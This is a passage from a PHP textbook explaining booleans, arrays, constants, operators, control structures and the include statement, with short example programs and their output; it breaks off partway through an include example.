The result of the equality operator is a Boolean; in this case, it would be false and, therefore, the if() statement would not be entered.

Now, consider the next code fragment:

    $numerator = 1;
    $denominator = 5;
    if ($denominator) {
        /* Perform calculation */
    } else {
        print "The denominator needs to be a non-zero number\n";
    }

You can see that no comparison operator was used in this example; however, PHP automatically internally converted $denominator or, to be more accurate, the value 5 to its Boolean equivalent, true, to perform the if() statement and, therefore, enter the calculation.

Although not all types have been covered yet, the following table shows the truth values of their values. You can revisit this table to check the Boolean equivalents of each type as you learn about the remaining types.

51

    Data Type        False Values                          True Values
    Integer          0                                     All non-zero values
    Floating point   0.0                                   All non-zero values
    Strings          Empty strings (""),                   All other strings
                     the zero string ("0")
    Null             Always                                Never
    Array            If it does not contain any elements   If it contains at least one element
    Object           Never                                 Always
    Resource         Never                                 Always

2.5.5 Null

Null is a data type with only one possible value: the NULL value. It marks variables as being empty, and it's especially useful to differentiate between the empty string and null values of databases.

The isset($variable) operator of PHP returns false for NULL, and true for any other data type, as long as the variable you're testing exists.

The following is an example of using NULL:

    $value = NULL;

2.5.6 Resources

Resources, a special data type, represent a PHP extension resource such as a database query, an open file, a database connection, and lots of other external types. You will never directly touch variables of this type, but will pass them around to the relevant functions that know how to interact with the specified resource.

2.5.7 Arrays

An array in PHP is a collection of key/value pairs. This means that it maps keys (or indexes) to values. Array indexes can be either integers or strings whereas values can be of any type (including other arrays).

Tip: Arrays in PHP are implemented using hash tables, which means that accessing a value has an average complexity of O(1).

2.5.7.1 array() construct

Arrays can be declared using the array() language construct, which generally takes the following form (elements inside square brackets, [], are optional):

    array([key =>] value, [key =>] value, ...)

52

The key is optional, and when it's not specified, the key is automatically assigned one more than the largest previous integer key (starting with 0). You can intermix the use with and without the key even within the same declaration.

The value itself can be of any PHP type, including an array. Arrays containing arrays give a similar result as multi-dimensional arrays in other languages.

Here are a few examples:

☞ array(1, 2, 3) is the same as the more explicit array(0 => 1, 1 => 2, 2 => 3).
☞ array("name" => "John", "age" => 28)
☞ array(1 => "ONE", "TWO", "THREE") is equivalent to array(1 => "ONE", 2 => "TWO", 3 => "THREE").
☞ array() is an empty array.

Here's an example of a nested array() statement:

    array(array("name" => "John", "age" => 28),
          array("name" => "Barbara", "age" => 67))

The previous example demonstrates an array with two elements: Each one is a collection (array) of a person's information.

2.5.7.2 Accessing Array Elements

Array elements can be accessed by using the $arr[key] notation, where key is either an integer or string expression. When using a constant string for key, make sure you don't forget the single or double quotes, such as $arr["key"]. This notation can be used for both reading array elements and modifying or creating new elements.

2.5.7.3 Modifying/Creating Array Elements

    $arr1 = array(1, 2, 3);
    $arr2[0] = 1;
    $arr2[1] = 2;
    $arr2[2] = 3;
    print_r($arr1);
    print_r($arr2);

The print_r() function has not been covered yet in this book, but when it is passed an array, it prints out the array's contents in a readable way. You can use this function when debugging your scripts.

The previous example prints

    Array
    (
        [0] => 1

53

        [1] => 2
        [2] => 3
    )
    Array
    (
        [0] => 1
        [1] => 2
        [2] => 3
    )

So, you can see that you can use both the array() construct and the $arr[key] notation to create arrays. Usually, array() is used to declare arrays whose elements are known at compile-time, and the $arr[key] notation is used when the elements are only computed at runtime.

PHP also supports a special notation, $arr[], where the key is not specified. When creating new array offsets using this notation (for example, using it as the l-value), the key is automatically assigned as one more than the largest previous integer key.

Therefore, the previous example can be rewritten as follows:

    $arr1 = array(1, 2, 3);
    $arr2[] = 1;
    $arr2[] = 2;
    $arr2[] = 3;

The result is the same as in the previous example.

The same holds true for arrays with string keys:

    $arr1 = array("name" => "John", "age" => 28);
    $arr2["name"] = "John";
    $arr2["age"] = 28;
    if ($arr1 == $arr2) {
        print '$arr1 and $arr2 are the same' . "\n";
    }

The message confirming the equality of both arrays is printed.

2.5.7.4 Reading array values

You can use the $arr[key] notation to read array values. The next few examples build on top of the previous example:

    print $arr2["name"];
    if ($arr2["age"] < 35) {
        print " is quite young\n";
    }

54

This example prints

    John is quite young

Note: As previously mentioned, using the $arr[] syntax is not supported when reading array indexes, but only when writing them.

2.5.7.5 Accessing Nested Arrays (or Multi-Dimensional Arrays)

When accessing nested arrays, you can just add as many square brackets as required to reach the relevant value. The following is an example of how you can declare nested arrays:

    $arr = array(1 => array("name" => "John", "age" => 28),
                 array("name" => "Barbara", "age" => 67));

You could achieve the same result with the following statements:

    $arr[1]["name"] = "John";
    $arr[1]["age"] = 28;
    $arr[2]["name"] = "Barbara";
    $arr[2]["age"] = 67;

Reading a nested array value is trivial using the same notation. For example, if you want to print John's age, the following statement does the trick:

    print $arr[1]["age"];

2.5.7.6 Traversing Arrays Using foreach

There are a few different ways of iterating over an array. The most elegant way is the foreach() loop construct.

The general syntax of this loop is

    foreach($array as [$key =>] [&] $value)
        ...

$key is optional, and when specified, it contains the currently iterated value's key, which can be either an integer or a string value, depending on the key's type.

Specifying & for the value is also optional, and it has to be done if you are planning to modify $value and want it to propagate to $array. In most cases, you won't want to modify the $value when iterating over an array and will, therefore, not need to specify it.
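The effect of the optional & can be sketched by running the same modification twice, once on a copy of each value and once by reference. The $prices array is made up for this illustration; the unset() after the second loop is a common precaution rather than something the text above requires.

```php
<?php
$prices = array("tea" => 2, "coffee" => 3);

// Without &, $value is a copy: the array itself is left untouched.
foreach ($prices as $value) {
    $value = $value * 2;
}
$unchanged = $prices;

// With &, $value aliases each element, so the change propagates to $prices.
foreach ($prices as $key => &$value) {
    $value = $value * 2;
}
unset($value); // drop the lingering reference to the last element

print_r($unchanged);
print_r($prices);
```

After both loops, $unchanged still holds the original prices, while $prices holds the doubled ones.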

55

Here's a short example of the foreach() loop:

    $players = array("John", "Barbara", "Bill", "Nancy");
    print "The players are:\n";
    foreach ($players as $key => $value) {
        print "#$key = $value\n";
    }

The output of this example is

    The players are:
    #0 = John
    #1 = Barbara
    #2 = Bill
    #3 = Nancy

Here's a more complicated example that iterates over an array of people and marks which person is considered old and which one is considered young:

    $people = array(1 => array("name" => "John", "age" => 28),
                    array("name" => "Barbara", "age" => 67));
    foreach ($people as &$person) {
        if ($person["age"] >= 35) {
            $person["age group"] = "Old";
        } else {
            $person["age group"] = "Young";
        }
    }
    print_r($people);

Again, this code makes use of the print_r() function.

The output of the previous code is the following:

    Array
    (
        [1] => Array
            (
                [name] => John
                [age] => 28
                [age group] => Young
            )
        [2] => Array
            (
                [name] => Barbara
                [age] => 67
                [age group] => Old

56

            )
    )

You can see that both the John and Barbara arrays inside the $people array were given an additional value with their respective age group.

2.5.7.7 Traversing Arrays Using list() and each()

Although foreach() is the nicer way of iterating over an array, an additional way of traversing an array is by using a combination of the list() construct and the each() function:

    $players = array("John", "Barbara", "Bill", "Nancy");
    reset($players);
    while (list($key, $val) = each($players)) {
        print "#$key = $val\n";
    }

The output of this example is

    #0 = John
    #1 = Barbara
    #2 = Bill
    #3 = Nancy

2.5.7.8 reset()

Iteration in PHP is done by using an internal array pointer that keeps record of the current position of the traversal. Unlike with foreach(), when you want to use each() to iterate over an array, you must reset() the array before you start to iterate over it. In general, it is best for you to always use foreach() and not deal with this subtle nuisance of each() traversal.

2.5.7.9 each()

The each() function returns the current key/value pair and advances the internal pointer to the next element. When it reaches the end of the array, it returns a Boolean value of false. The key/value pair is returned as an array with four elements: the elements 0 and "key", which have the value of the key, and elements 1 and "value", which have the value of the value. The reason for duplication is that, if you're accessing these elements individually, you'll probably want to use the names such as $elem["key"] and $elem["value"]:

    $ages = array("John" => 28, "Barbara" => 67);
    reset($ages);
    $person = each($ages);

57

    print $person["key"];
    print " is of age ";
    print $person["value"];

This prints

    John is of age 28

When we explain how the list() construct works, you will understand why offsets 0 and 1 also exist.

2.5.7.10 list()

The list() construct is a way of assigning multiple array offsets to multiple variables in one statement:

    list($var1, $var2, ...) = $array;

The first variable in the list is assigned the array value at offset 0, the second is assigned offset 1, and so on. Therefore, the list() construct translates into the following series of PHP statements:

    $var1 = $array[0];
    $var2 = $array[1];
    ...

As previously mentioned, the indexes 0 and 1 returned by each() are used by the list() construct. You can probably already guess how the combination of list() and each() works.

Consider the while line from the previous $players traversal example:

    $players = array("John", "Barbara", "Bill", "Nancy");
    reset($players);
    while (list($key, $val) = each($players)) {
        print "#$key = $val\n";
    }

What happens in the while line is that during every loop iteration, each() returns the current position's key/value pair array, which, when examined with print_r(), is the following array:

    Array
    (
        [1] => John
        [value] => John

58

        [0] => 0
        [key] => 0
    )

Then, the list() construct assigns the array's offset 0 to $key and offset 1 to $val.

2.5.7.11 Additional Methods for Traversing Arrays

You can use other functions to iterate over arrays including current() and next(). You shouldn't use them because they are confusing and are legacy functions. In addition, some standard functions allow all sorts of elegant ways of dealing with arrays such as array_walk(), which is covered in a later chapter.

2.5.8 Constants

In PHP, you can define names, called constants, for simple values. As the name implies, you cannot change these constants once they represent a certain value. The names for constants have the same rules as PHP variables except that they don't have the leading dollar sign. It is common practice in many programming languages, including PHP, to use uppercase letters for constant names, although you don't have to. If you wish, which we do not recommend, you may define your constants as case-insensitive, thus not requiring code to use the correct casing when referring to your constants.

Tip: Only use case-sensitive constants, both to be consistent with accepted coding standards and because it is unclear if case-insensitive constants will continue to be supported in future versions of PHP.

Unlike variables, constants, once defined, are globally accessible. You don't have to (and can't) redeclare them in each new function and PHP file.

To define a constant, use the following function:

    define("CONSTANT_NAME", value [, case_insensitive])

Where:

☞ "CONSTANT_NAME" is a string.
☞ value is any valid PHP expression excluding arrays and objects.
☞ case_insensitive is a Boolean (true/false) and is optional. The default is false, which makes the constant name case-sensitive.

An example for a built-in constant is the Boolean value true, which is registered as case-insensitive.

Here's a simple example for defining and using a constant:

59

    define("MY_OK", 0);
    define("MY_ERROR", 1);
    ...
    if ($error_code == MY_ERROR) {
        print("There was an error\n");
    }

2.6 OPERATORS

PHP contains three types of operators: unary operators, binary operators, and one ternary operator.

Binary operators are used on two operands:

    2 + 3
    14 * 3.1415
    $i - 1

These examples are also simple examples of expressions.

PHP can only perform binary operations on two operands that have the same type. However, if the two operands have different types, PHP automatically converts one of them to the other's type, according to the following rules (unless stated differently, such as in the concatenation operator).

    Type of One of    Type of the       Conversion Performed
    the Operands      Other Operand
    Integer           Floating point    The integer operand is converted to a floating point number.
    Integer           String            The string is converted to a number. If the converted string's
                                        type is real, the integer operand is converted to a real as well.
    Real              String            The string is converted to a real.

Booleans, nulls, and resources behave like integers, and they convert in the following manner:

☞ Boolean: False = 0, True = 1
☞ Null = 0
☞ Resource = The resource's # (id)
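The conversion rules above can be observed with the addition operator. This is a small sketch with arbitrary variable names; resources are left out because creating one requires an extension call.

```php
<?php
// Integer with floating point: the integer is converted, the result is a float.
$a = 1 + 1.5;      // float(2.5)

// Integer with an integer-like string: the string is converted to a number.
$b = 2 + "3";      // int(5)

// If the string holds a real number, the integer becomes a real as well.
$c = 2 + "3.5";    // float(5.5)

// Booleans and null behave like the integers 1 (or 0) and 0.
$d = true + 1;     // int(2)
$e = null + 1;     // int(1)

var_dump($a, $b, $c, $d, $e);
```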

60

2.6.1 Binary Operators

2.6.1.1 Numeric Operators

All the binary operators (except for the concatenation operator) work only on numeric operands. If one or both of the operands are strings, Booleans, nulls, or resources, they are automatically converted to their numeric equivalents before the calculation is performed (according to the previous table).

    Operator   Name             Value
    +          Addition         The sum of the two operands.
    -          Subtraction      The difference between the two operands.
    *          Multiplication   The product of the two operands.
    /          Division         The quotient of the two operands.
    %          Modulus          Both operands are converted to integers. The result is the
                                remainder of the division of the first operand by the
                                second operand.

2.6.1.2 Concatenation Operator (.)

The concatenation operator concatenates two strings. This operator works only on strings; thus, any non-string operand is first converted to one.

The following example would print out "The year is 2000":

    $year = 2000;
    print "The year is " . $year;

The integer $year is internally converted to the string "2000" before it is concatenated with the string's prefix, "The year is ".

2.6.2 Assignment Operators

Assignment operators enable you to write a value to a variable. The first operand (the one on the left of the assignment operator, or l value) must be a variable. The value of an assignment is the final value assigned to the variable; for example, the expression $var = 5 has the value 5 (and assigns 5 to $var).
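A brief sketch of three points from this page: the modulus operator working on integers, the dot operator converting its operand to a string, and an assignment being usable as a value. The variable names are illustrative.

```php
<?php
// % works on integers: the numeric string "17" is converted first.
$remainder = "17" % 5;

// The dot operator converts the integer to a string before joining.
$year = 2000;
$sentence = "The year is " . $year;

// An assignment is itself an expression whose value is the assigned value,
// which is what makes chained assignments possible.
$a = $b = 5;

var_dump($remainder, $sentence, $a, $b);
```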

61

In addition to the regular assignment operator =, several other assignment operators are composites of an operator followed by an equal sign. These composite operators apply the operator taking the variable on the left as the first operand and the value on the right (the r value) as the second operand, and assign the result of the operation to the variable on the left.

For example:

    $counter += 2;        // This is identical to $counter = $counter + 2;
    $offset *= $counter;  // This is identical to $offset = $offset * $counter;

The following list shows the valid composite assignment operators:

    +=, -=, *=, /=, %=, ^=, .=, &=, |=, <<=, >>=

2.6.2.1 By-Reference Assignment Operator

PHP enables you to create variables as aliases for other variables. You can achieve this by using the by-reference assignment operator =&. After a variable aliases another variable, changes to either one of them affect the other.

For example:

    $name = "Judy";
    $name_alias =& $name;
    $name_alias = "Jonathan";
    print $name;

The result of this example is

    Jonathan

When returning a variable by-reference from a function (covered later in this book), you also need to use the assign by-reference operator to assign the returned variable to a variable:

    $retval =& func_that_returns_by_reference();

2.6.3 Comparison Operators

Comparison operators enable you to determine the relationship between two operands.

When both operands are strings, the comparison is performed lexicographically. The comparison results in a Boolean value.

For the following comparison operators, automatic type conversions are performed, if necessary.

62

    Operator   Name                       Value
    ==         Equal to                   Checks for equality between two arguments, performing type
                                          conversion when necessary:
                                          1 == "1" results in true.
                                          1 == 1 results in true.
    !=         Not equal to               Inverse of ==.
    >          Greater than               Checks if first operand is greater than second.
    <          Smaller than               Checks if first operand is smaller than second.
    >=         Greater than or equal to   Checks if first operand is greater or equal to second.
    <=         Smaller than or equal to   Checks if first operand is smaller or equal to second.

For the following two operators, automatic type conversions are not performed and, therefore, both the types and the values are compared.

    Operator   Name               Value
    ===        Identical to       Same as == but the types of the operands have to match.
                                  No automatic type conversions are performed:
                                  1 === "1" results in false.
                                  1 === 1 results in true.
    !==        Not identical to   The inverse of ===.

2.6.4 Logical Operators

Logical operators first convert their operands to Boolean values and then perform the respective comparison.

63

    Operator   Name          Value
    &&, and    Logical AND   The result of the logical AND operation between the two operands.
    ||, or     Logical OR    The result of the logical OR operation between the two operands.
    xor        Logical XOR   The result of the logical XOR operation between the two operands.

2.6.4.1 Short-Circuit Evaluation

When evaluating the logical and/or operators, you can often know the result without having to evaluate both operands. For example, when PHP evaluates 0 && 1, it can tell the result will be false by looking only at the left operand, and it won't continue to evaluate the right one. This might not seem useful right now, but later on, we'll see how we can use it to execute an operation only if a certain condition is met.

2.6.5 Bitwise Operators

Bitwise operators perform an operation on the bitwise representation of their arguments. Unless the arguments are strings, they are converted to their corresponding integer representation, and the operation is then performed. In case both arguments are strings, the operation is performed between corresponding character offsets of the two strings (each character is treated as an integer).

    Operator   Name          Value
    &          Bitwise AND   Unless both operands are strings, the integer value of the
                             bitwise AND operation between the two operands.
                             If both operands are strings, a string in which each character
                             is the result of a bitwise AND operation between the two
                             corresponding characters in the operands. In case the two
                             operand strings are of different lengths, the result string is
                             truncated to the length of the shorter operand.

64

    |          Bitwise OR    Unless both operands are strings, the integer value of the
                             bitwise OR operation between the two operands.
                             If both operands are strings, a string in which each character
                             is the result of a bitwise OR operation between the two
                             corresponding characters in the operands. In case the two
                             operand strings are of different lengths, the result string has
                             the length of the longer operand; the missing characters in the
                             shorter operand are assumed to be zeros.
    ^          Bitwise XOR   Unless both operands are strings, the integer value of the
               (exclusive    bitwise XOR operation between the two operands.
               or)           If both operands are strings, a string in which each character
                             is the result of a bitwise XOR operation between the two
                             corresponding characters in the operands. In case the two
                             operand strings are of different lengths, the result string is
                             truncated to the length of the shorter operand.

2.6.6 Unary Operators

Unary operators act on one operand.

2.6.7 Negation Operators

Negation operators appear before their operand, for example, !$var (! is the operator, $var is the operand).

    Operator   Name               Value
    !          Logical Negation   true if the operand evaluates to false.
                                  false if the operand evaluates to true.

65

    ~          Bitwise Negation   In case of a numeric operand, the bitwise negation of its
                                  bitwise representation (floating-point values are first
                                  converted to integers).
                                  In case of strings, a string of equal length, in which each
                                  character is the bitwise negation of its corresponding
                                  character in the original string.

2.6.8 Increment/Decrement Operators

Increment/decrement operators are unique in the sense that they operate only on variables and not on any value. The reason for this is that in addition to calculating the result value, the value of the variable itself changes as well.

    Operator   Name             Effect on $var                 Value of the Expression
    $var++     Post-increment   $var is incremented by 1.      The previous value of $var.
    ++$var     Pre-increment    $var is incremented by 1.      The new value of $var (incremented by 1).
    $var--     Post-decrement   $var is decremented by 1.      The previous value of $var.
    --$var     Pre-decrement    $var is decremented by 1.      The new value of $var (decremented by 1).

As you can see from the previous table, there's a difference in the value of post- and pre-increment. However, in both cases, $var is incremented by 1. The only difference is in the value to which the increment expression evaluates.

Example 1:

    $num1 = 5;
    $num2 = $num1++; // post-increment, $num2 is assigned $num1's original value
    print $num1;     // this will print the value of $num1, which is now 6
    print $num2;     // this will print the value of $num2, which is the
                     // original value of $num1, thus, 5

66

Example 2:

    $num1 = 5;
    $num2 = ++$num1; // pre-increment, $num2 is assigned $num1's incremented value
    print $num1;     // this will print the value of $num1, which is now 6
    print $num2;     // this will print the value of $num2, which is the
                     // same as the value of $num1, thus, 6

The same rules apply to pre- and post-decrement.

2.6.8.1 Incrementing Strings

Strings (when not numeric) are incremented in a similar way to Perl. If the last letter is alphanumeric, it is incremented by 1. If it was 'z', 'Z', or '9', it is incremented to 'a', 'A', or '0' respectively, and the next alphanumeric is also incremented in the same way. If there is no next alphanumeric, one is added to the beginning of the string as 'a', 'A', and '1', respectively. If this gives you a headache, just try and play around with it. You'll get the hang of it pretty quickly.

Note: Non-numeric strings cannot be decremented.

2.6.9 The Cast Operators

PHP provides a C-like way to force a type conversion of a value by using the cast operators. The operand appears on the right side of the cast operator, and its result is the converted type according to the following table.

    Operator                     Changes Type To
    (int), (integer)             Integer
    (float), (real), (double)    Floating point
    (string)                     String
    (bool), (boolean)            Boolean
    (array)                      Array
    (object)                     Object

The casting operators change the type of a value and not the type of a variable. For example:

    $str = "5";
    $num = (int) $str;

This results in $num being assigned the integer value of $str (5), but $str remains of type string.
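For readers who want to "play around" as suggested, here is a minimal sketch covering both the cast example and a few string increments. The sample strings are arbitrary, and the results in the comments reflect the Perl-style rules described in section 2.6.8.1.

```php
<?php
// A cast produces a converted value; the source variable keeps its type.
$str = "5";
$num = (int) $str;
$typeOfStr = gettype($str);   // "string"
$typeOfNum = gettype($num);   // "integer"

// Perl-style string increment: the last character wraps and carries over.
$a = "a";  $a++;   // "b"
$z = "Az"; $z++;   // "Ba"  ('z' wraps to 'a', the carry increments 'A')
$n = "zz"; $n++;   // "aaa" (no further character, so an 'a' is prepended)
$m = "a9"; $m++;   // "b0"  ('9' wraps to '0', the carry increments 'a')

var_dump($typeOfStr, $typeOfNum, $a, $z, $n, $m);
```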

67

2.6.10 The Silence Operator

The operator @ silences error messages during the evaluation process of an expression. It is discussed in more detail in Chapter 7.

2.6.11 The One and Only Ternary Operator

One of the most elegant operators is the ?: (question mark) operator. Its format is

    truth_expr ? expr1 : expr2

The operator evaluates truth_expr and checks whether it is true. If it is, the value of the expression evaluates to the value of expr1 (expr2 is not evaluated). If it is false, the value of the expression evaluates to the value of expr2 (expr1 is not evaluated).

For example, the following code snippet checks whether $a is set (using isset()) and displays a message accordingly:

    $a = 99;
    $message = isset($a) ? '$a is set' : '$a is not set';
    print $message;

This example prints the following:

    $a is set

2.7 CONTROL STRUCTURES

PHP supports a variety of the most common control structures available in other programming languages. They can be basically divided into two groups: conditional control structures and loop control structures. The conditional control structures affect the flow of the program and execute or skip certain code according to certain criteria, whereas loop control structures execute certain code an arbitrary number of times according to specified criteria.

2.7.1 Conditional Control Structures

Conditional control structures are crucial in allowing your program to take different execution paths based on decisions it makes at runtime. PHP supports both the if and switch conditional control structures.
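The rule from section 2.6.11 that only one of expr1 and expr2 is evaluated can be made visible with a sketch. The helper tracked() is hypothetical and exists only to record which branch actually ran.

```php
<?php
// Hypothetical helper: appends its label to $calls and returns the label.
function tracked($label, array &$calls)
{
    $calls[] = $label;
    return $label;
}

$calls = array();
$count = 3;

// Only the selected branch is evaluated, so tracked("many", ...) never runs.
$result = ($count < 5) ? tracked("few", $calls) : tracked("many", $calls);

print $result . "\n";
print_r($calls);
```

Because the condition is true, $calls ends up containing only "few", which shows that the second branch was skipped rather than evaluated and discarded.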

2.7.1.1 if Statements

    Statement                    Statement List
    if (expr)                    if (expr):
        statement                    statement list
    elseif (expr)                elseif (expr):
        statement                    statement list
    elseif (expr)                elseif (expr):
        statement                    statement list
    ...                          ...
    else                         else:
        statement                    statement list
                                 endif;

if statements are the most common conditional constructs, and they exist in most programming languages. The expression in the if statement is referred to as the truth expression. If the truth expression evaluates to true, the statement or statement list following it is executed; otherwise, it is not.

You can add an else branch to an if statement to execute code only if all the truth expressions in the if statement evaluated to false:

    if ($var >= 50) {
        print '$var is in range';
    } else {
        print '$var is invalid';
    }

Notice the braces that delimit the statements following if and else, which make these statements a statement block. In this particular case, you can omit the braces because both blocks contain only one statement in them. It is good practice to write these braces even if they’re not syntactically required. Doing so improves readability, and it’s easier to add more statements to the block later (for example, during debugging).

The elseif construct can be used to conduct a series of conditional checks and only execute the code following the first condition that is met. For example:

    if ($num < 0) {
        print '$num is negative';
    } elseif ($num == 0) {
        print '$num is zero';
    } elseif ($num > 0) {
        print '$num is positive';
    }

The last elseif could be substituted with an else because, if $num is not negative and not zero, it must be positive.

Note: It’s common practice by PHP developers to use C-style else if notation instead of elseif.

Both styles of the if construct behave in the same way. While the statement style is probably more readable and convenient for use inside PHP code blocks, the statement list style extends readability when used to conditionally display HTML blocks. Here’s an alternative way to implement the previous example using HTML blocks instead of print:

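    <?php if ($num < 0): ?>
    <h1>$num is negative</h1>
    <?php elseif ($num == 0): ?>
    <h1>$num is zero</h1>
    <?php elseif ($num > 0): ?>
    <h1>$num is positive</h1>
    <?php endif; ?>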

As you can see, HTML blocks can be used just like any other statement. Here, only one of the HTML blocks is displayed, depending on the value of $num.

Note: No variable substitution is performed in the HTML blocks. They are always printed as is.

2.7.1.2 switch Statements

    Statement                    Statement List
    switch (expr) {              switch (expr):
        case expr:                   case expr:
            statement list               statement list
        case expr:                   case expr:
            statement list               statement list
        ...                          ...
        default:                     default:
            statement list               statement list
    }                            endswitch;

You can use the switch construct to elegantly replace certain lengthy if/elseif constructs. It is given an expression and compares it to all possible case expressions listed in its body. When there’s a successful match, the following code is executed, ignoring any further case lines (execution does not stop when the next case is reached). The match is done internally using the regular equality operator (==), not the identical operator (===). You can use the break statement to end execution and skip to the code following the switch construct.

Usually, break statements appear at the end of a case statement list, although it is not mandatory. If no case expression is met and the switch construct contains default, the default statement list is executed. Note that the default case is conventionally placed last in the list of cases, or omitted altogether:

    switch ($answer) {
        case 'y':
        case 'Y':
            print "The answer was yes\n";
            break;
        case 'n':
        case 'N':
            print "The answer was no\n";
            break;
        default:
            print "Error: $answer is not a valid answer\n";
            break;
    }

2.7.2 Loop Control Structures

Loop control structures are used for repeating certain tasks in your program, such as iterating over a database query result set.

2.7.2.1 while loops

    Statement                    Statement List
    while (expr)                 while (expr):
        statement                    statement list
                                 endwhile;

while loops are the simplest kind of loops. In the beginning of each iteration, the while’s truth expression is evaluated. If it evaluates to true, the loop keeps on running and the statements inside it are executed. If it evaluates to false, the loop ends and the statements inside the loop are skipped. For example, here’s one possible implementation of factorial, using a while loop (assuming $n contains the number for which we want to calculate the factorial):

    $result = 1;
    while ($n > 0) {
        $result *= $n--;
    }
    print "The result is $result";
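Two of the switch rules described in Section 2.7.1.2 are easy to overlook: matching uses ==, and execution falls through into the next case when there is no break. The following is a minimal sketch of both; the function name describe() and its labels are hypothetical and exist only for this illustration.

```php
<?php
// Hypothetical helper that shows loose matching and fall-through.
function describe($value)
{
    $out = '';
    switch ($value) {
        case 5:             // compared with ==, so the string "5" matches too
            $out .= 'five ';
            // no break here: execution falls through into the next case
        case 6:
            $out .= 'five-or-six';
            break;          // leaves the switch
        default:
            $out .= 'other';
            break;
    }
    return $out;
}

print describe("5") . "\n";
print describe(6) . "\n";
print describe(7) . "\n";
```

The three calls should print "five five-or-six", "five-or-six", and "other". If fall-through is not what you want, end each case statement list with break.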

2.7.2.2 Loop Control: break and continue

    break;
    break expr;
    continue;
    continue expr;

Sometimes, you want to terminate the execution of a loop in the middle of an iteration. For this purpose, PHP provides the break statement. If break appears alone, as in

    break;

the innermost loop is stopped. break accepts an optional argument of the number of nesting levels to break out of,

    break n;

which will break from the n innermost loops (break 1; is identical to break;). n can be any valid expression.

In other cases, you may want to stop the execution of a specific loop iteration and begin executing the next one. Complementary to break, continue provides this functionality. continue alone stops the execution of the innermost loop iteration and continues executing the next iteration of that loop. continue n can be used to stop execution of the n innermost loop iterations. PHP goes on executing the next iteration of the outermost of those n loops.

As the switch statement also supports break, it is counted as a loop when you want to break out of a series of loops with break n.

2.7.2.3 do...while Loops

    do
        statement
    while (expr);

The do...while loop is similar to the previous while loop, except that the truth expression is checked at the end of each iteration instead of at the beginning. This means that the loop always runs at least once.

do...while loops are often used as an elegant solution for easily breaking out of a code block if a certain condition is met. Consider the following example:

    do {
        statement list
        if ($error) {
            break;
        }

        statement list
    } while (false);

Because do...while loops always iterate at least one time, the statements inside the loop are executed once, and only once. The truth expression is always false. However, inside the loop body, you can use the break statement to stop the execution of the statements at any point, which is convenient. Of course, do...while loops are also often used for regular iterating purposes.

2.7.2.4 for Loops

    Statement
    for (expr, expr, ...; expr, expr, ...; expr, expr, ...)
        statement

    Statement List
    for (expr, expr, ...; expr, expr, ...; expr, expr, ...):
        statement list
    endfor;

PHP provides C-style for loops. The for loop accepts three arguments:

    for (start_expressions; truth_expressions; increment_expressions)

Most commonly, for loops are used with only one expression for each of the start, truth, and increment expressions, which would make the previous syntax table look slightly more familiar.

    Statement                    Statement List
    for (expr; expr; expr)       for (expr; expr; expr):
        statement                    statement list
                                 endfor;

The start expression is evaluated only once when the loop is reached. Usually it is used to initialize the loop control variable. The truth expression is evaluated in the beginning of every loop iteration. If true, the statements inside the loop will be executed; if false, the loop ends. The increment expression is evaluated at the end of every iteration before the truth expression is evaluated. Usually, it is used to increment the loop control variable, but it can be used for any other purpose as well. Both break and continue behave the same way as they do with while loops. continue causes evaluation of the increment expression before it re-evaluates the truth expression.
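The loop-control rules above (continue inside a for loop, break n across nested loops, and the do...while (false) idiom) can be sketched together as follows. All variable names, and the $error flag in particular, are assumptions made for this illustration.

```php
<?php
// continue in a for loop: the increment expression ($i++) still runs.
$odd = array();
for ($i = 0; $i < 6; $i++) {
    if ($i % 2 == 0) {
        continue;           // skip even numbers
    }
    $odd[] = $i;
}

// break 2 leaves both the inner and the outer loop at once.
$found = null;
for ($row = 0; $row < 3; $row++) {
    for ($col = 0; $col < 3; $col++) {
        if ($row * $col == 2) {
            $found = "$row,$col";
            break 2;
        }
    }
}

// do...while (false): a block that runs once and can be left early.
$error = true;              // assumed error flag
$steps = array();
do {
    $steps[] = 'first';
    if ($error) {
        break;              // skip the rest of the block
    }
    $steps[] = 'second';
} while (false);

print implode(',', $odd) . " | $found | " . implode(',', $steps) . "\n";
```

This should print "1,3,5 | 1,2 | first".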

Here’s an example:

    for ($i = 0; $i < 10; $i++) {
        print "The square of $i is " . $i*$i . "\n";
    }

The result of running this code is

    The square of 0 is 0
    The square of 1 is 1
    ...
    The square of 9 is 81

Like in C, it is possible to supply more than one expression for each of the three arguments by using commas to delimit them. The value of each argument is the value of the rightmost expression.

Alternatively, it is also possible not to supply an expression with one or more of the arguments. The value of such an empty argument will be true. For example, the following is an infinite loop:

    for (;;) {
        print "I'm infinite\n";
    }

Tip: PHP doesn’t know how to optimize many kinds of loop invariants. For example, in the following for loop, count($array) will not be optimized to run only once.

    for ($i = 0; $i < count($array); $i++) {
    }

It should be rewritten as

    $count = count($array);
    for ($i = 0; $i < $count; $i++) {
    }

This ensures that you get the best performance during the execution of the loop.
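As a hedged illustration of comma-separated for arguments, the sketch below walks an array from both ends at once. The sample array and the $pairs variable are made up for this example; note that count() appears in the start expression, so it is evaluated only once, in line with the tip above.

```php
<?php
$array = array('a', 'b', 'c', 'd');

// Two start expressions and two increment expressions, separated by commas.
$pairs = array();
for ($i = 0, $j = count($array) - 1; $i < $j; $i++, $j--) {
    $pairs[] = $array[$i] . $array[$j];
}

print implode(' ', $pairs) . "\n";
```

This should print "ad bc": the loop stops as soon as the two indexes meet or cross.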

2.7.3 Code Inclusion Control Structures

Code inclusion control structures are crucial for organizing a program’s source code. Not only will they allow you to structure your program into building blocks, but you will probably find that some of these building blocks can later be reused in other programs.

2.7.3.1 include Statement and Friends

As in other languages, PHP allows for splitting source code into multiple files using the include statement. Splitting your code into many files is usually helpful for code reuse (being able to include the same source code from various scripts) or just in helping keep the code more maintainable. When an include statement is executed, PHP reads the file, compiles it into intermediate code, and then executes the included code. Unlike C/C++, the include statement behaves somewhat like a function (although it isn’t a function but a built-in language construct) and can return a value using the return statement. Also, the included file runs in the same variable scope as the including script (except for the execution of included functions, which run with their own variable scope).

The prototype of include is

    include file_name;

Here are two examples for using include:

☞ error_codes.php

    <?php
        $MY_OK = 0;
    ?>

☞ test.php

    <?php
        include "error_codes.php";
        print 'The value of $MY_OK is ' . "$MY_OK\n";
    ?>

This prints as

    The value of $MY_OK is 0
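The two properties of include mentioned above, that it can return a value and that the included code shares the including script's variable scope, can be seen in one self-contained sketch. To keep it runnable as a single script, it writes the included file to a temporary location first; the temporary file, its contents, and the $returned variable are assumptions made for this illustration.

```php
<?php
// Create a small file to include (illustrative contents only).
$file = tempnam(sys_get_temp_dir(), 'inc');
file_put_contents($file, '<?php $MY_OK = 0; return "loaded";');

// include runs the file in the current scope and hands back its return value.
$returned = include $file;

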